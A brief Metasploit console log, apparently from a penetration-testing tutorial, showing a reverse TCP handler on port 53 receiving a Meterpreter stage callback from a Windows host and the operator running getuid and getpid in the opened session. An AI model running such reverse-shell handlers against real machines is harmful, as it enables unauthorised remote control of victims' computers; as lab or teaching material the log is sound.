msfexploit(multi/handler) >exploit[*] Started reverse TCP handler on 192.168.1.4:53[*] Sending stage (179779bytes) to 192.168.1.5[*] Meterpreter session 23 opened (192.168.1.4:53 ‐>192.168.1.5:11349)at2019‐01‐2009:25:01‐0500meterpreter>getuidServerusername:John‐PC\Johnmeterpreter>getpidCurrentpid:11236meterpreter>